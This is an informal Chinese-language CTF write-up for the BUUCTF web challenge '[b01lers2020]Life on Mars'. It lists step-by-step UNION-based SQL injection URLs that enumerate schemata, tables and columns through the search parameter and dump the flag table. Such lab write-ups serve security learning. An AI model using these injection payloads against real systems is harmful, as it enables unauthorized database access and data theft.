81,【5】BUUCTF WEB [b01lers2020]Life on Mars
进入靶场
怎莫颠颠的,一下子就想到展博了
先把左边的挨个点一遍
在最后一个有点收获
不过也没其他收获了
这种进去给个正常网页的题目,基本都靠url获取信息了
抓包看看有没有其他信息
竟然没有任何信息
自闭了
看别人的wp去咯
为什么别人抓到的包里面有get传参的内容,我啥也没有,怎么点也没有
???????
无所谓,我会自己加
query?search=hesperia_planum& 
直接无响应了
还少个cookie
F12也没得到
那就先看别人的wp吧,熟悉下传参的单词,字母也好
题目的原理是很简单的SQL注入,甚至没有什么过滤
/query?search=amazonis_planitia union select 1,database()
/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata
/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'
/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'
/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code
得到flag